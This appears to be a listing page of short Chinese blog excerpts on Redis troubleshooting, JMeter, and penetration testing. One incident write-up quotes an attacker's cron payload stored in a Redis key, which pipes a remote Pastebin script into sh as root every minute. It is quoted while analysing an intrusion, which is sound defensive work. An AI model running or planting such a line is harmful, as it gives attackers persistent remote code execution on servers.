日志集中式监控平台上线已经有一段时间，但是大部分情况下只是作为发布或者出问题时查看日志的便利工具使用。平时大家都不怎么主动上去看看。于是前几天把应用的错误日志也加上邮件、Hi和短信报警，马上就收到很多错误报警，引起了大家的重视。其中有一个Redis报错： 看起来挺严重的，拿不到Redis连接 ...

zabbix告警突然从某个时间点开始提示CPU使用高，网卡流量也一直居高不下。 首先查看redis日志，发现告警时间点redis主节点被重启了，发生了主备切换，并且在日志中发现这么一段 [3081] 06 Dec 02:33:28.090 # Client addr=****:35810 ...

起因 偶然间发现redis里有一个陌生key：tightsoft，它的值是：*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh 看key名就知道这肯定不是我们存的，再看value我警觉了，这是要定时执行脚本啊。 分析 ...

话说刚开始接触安全测试时，没有一个系统的概念，前辈仍一个内网测试网站，让我把的shell拿下来，那我就开始吭哧吭哧的干起来。 首先，做渗透测试要有个思路，不能埋头苦干。所以就开始理了下思路，具体如下： 判断有无sql注入点，根据sql注入点来判断数据库类型，若是mssqlserver ...

1、首先要安装JVM，确认是不是安装和配置成功，可以用命令输入 “java -version”查询 2、从官网下载Jmeter，解压 3、录制脚本或者自己根据接口文档/抓包获取接口编写测试的脚本（注：本质就是通过接口协议模拟浏览器访问服务器） 4、配置线程数，每个线程数代表一个模拟操作的人 ...

0x00 渗透测试目标 目标：荷兰某厂商(不好意思,厂商信息不能写) 内容：渗透测试 0x01 信息收集 服务器：Microsoft-IIS/7.5 Web应用：ASP.NET 数据库：Access(数据库也太小了) 目标端口：扫描了没啥有用的。 Whois ...

最近测试环境的redis经常性发生某些key丢失的问题，最终的找到的问题让人大吃一惊。 复盘一下步骤： 1、发现问题 不知道从某天开始，后台经常报错，原因是某些key丢失，一开始不在意，以为是小bug，后来越来越频繁。 2、检查代码 看看是不是有误删除的情况，这些key的访问范围很小，压根没有删除 ...

前言： 当我们接到一个授权渗透测试的时候，常规漏洞如注入、文件上传等尝试无果后，扫描端口可能会发现意外收获。 知己知彼乃百战不殆，Redis介绍： 简单来说 redis 就是一个Key-Value类型的数据库， redis 所有数据全部在内存中进行操作，并且它可以将内存中的数据定期存储在磁盘 ...